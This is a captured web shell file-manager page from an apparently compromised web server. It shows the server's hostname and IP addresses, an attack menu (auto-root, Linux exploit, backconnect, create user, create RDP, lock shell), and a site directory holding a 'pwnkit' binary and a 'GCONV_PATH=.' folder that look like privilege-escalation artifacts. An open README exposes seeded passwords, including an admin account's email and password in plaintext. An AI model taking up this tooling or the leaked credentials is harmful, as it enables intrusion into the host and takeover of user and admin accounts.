Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.138
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechs.io /
[ HOME SHELL ]
Name
Size
Permission
Action
.agents
[ DIR ]
drwxr-xr-x
.git
[ DIR ]
drwxr-xr-x
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
1pfmxaq
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
chuozgb
[ DIR ]
drwxr-xr-x
client
[ DIR ]
drwxr-xr-x
gbunscv
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
mbafyhz
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
oxnegwk
[ DIR ]
drwxr-xr-x
prisma
[ DIR ]
drwxr-xr-x
product-images
[ DIR ]
drwxr-xr-x
q1nzmhg
[ DIR ]
drwxr-xr-x
sdgkzyo
[ DIR ]
drwxr-xr-x
server
[ DIR ]
drwxr-xr-x
sutvapd
[ DIR ]
drwxr-xr-x
.env
1.52
KB
-rw-------
.env.example
1.24
KB
-rw-r--r--
.gitignore
90
B
-rw-r--r--
.htaccess
354
B
-rw-r--r--
.htaccess.testoff
1.02
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
All Softwares & Websites.pdf
8.07
MB
-rw-r--r--
README.md
1.46
KB
-rw-r--r--
api.err.log
0
B
-rw-r--r--
api.log
0
B
-rw-r--r--
database.sqlite
0
B
-rw-r--r--
favicon.ico
804
B
-rw-r--r--
index.html
462
B
-rw-r--r--
index.html.dev-backup
371
B
-rw-r--r--
logo.png
506.48
KB
-rw-r--r--
logo1.png
196.06
KB
-rw-r--r--
output-onlinegiftools-1-1.gif
3.78
MB
-rw-r--r--
output-onlinegiftools-2.gif
4
MB
-rw-r--r--
package-lock.json
186.62
KB
-rw-r--r--
package.json
1.5
KB
-rw-r--r--
path
24
KB
-rw-r--r--
path_
128
KB
-rw-r--r--
postcss.config.js
79
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
robots.txt
94
B
-rw-r--r--
store-support-call-ai.svg
7.43
KB
-rw-r--r--
tailwind.config.js
373
B
-rw-r--r--
test_fetch.js
476
B
-rw-r--r--
vite.config.js
283
B
-rw-r--r--
vite.err.log
0
B
-rw-r--r--
vite.log
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# Store Product Demo A full-stack product storefront with account-tied, per-product, 48-hour storefront and admin panel demo environments. ## Stack - Node.js and Express API - Prisma ORM with SQLite for local development - React, Vite, Tailwind CSS - JWT auth through bearer tokens and http-only cookies - One-time forgot-password links with hashed reset tokens - Masked demo iframe stream endpoints ## Quick Start ```bash npm.cmd install Copy-Item .env.example .env npm.cmd run prepare:db npm.cmd run dev ``` Open `http://localhost:5173`. Forgot-password links are logged by the API in development and are also returned in the reset request response outside production. Configure `PASSWORD_RESET_URL_ORIGIN` when the client is not served from `CLIENT_ORIGIN`. Seeded users: - Buyer: `buyer@scriptmarket.dev` / `BuyerPass123!` - Admin: `hahnm@signalhg.com` / `Newteam7944@` Seeded product admin demo: - Email: `store.admin@example.com` - Password: `StoreAdmin#48` - Username: `store-demo-admin` ## Key Demo Rules - A demo session is unique to a `userId` and `productId`. - Activating Product A does not start Product B's trial. - Expired sessions are denied by both the activation endpoint and stream middleware. - Product listing and detail responses never include `demoConfig`. - Iframes load only `/api/demo/stream/:sessionId/:type`, never the secret target URL. - Open a product, activate its demo, then choose **View Admin Panel** to see the product admin preview and credentials.
Close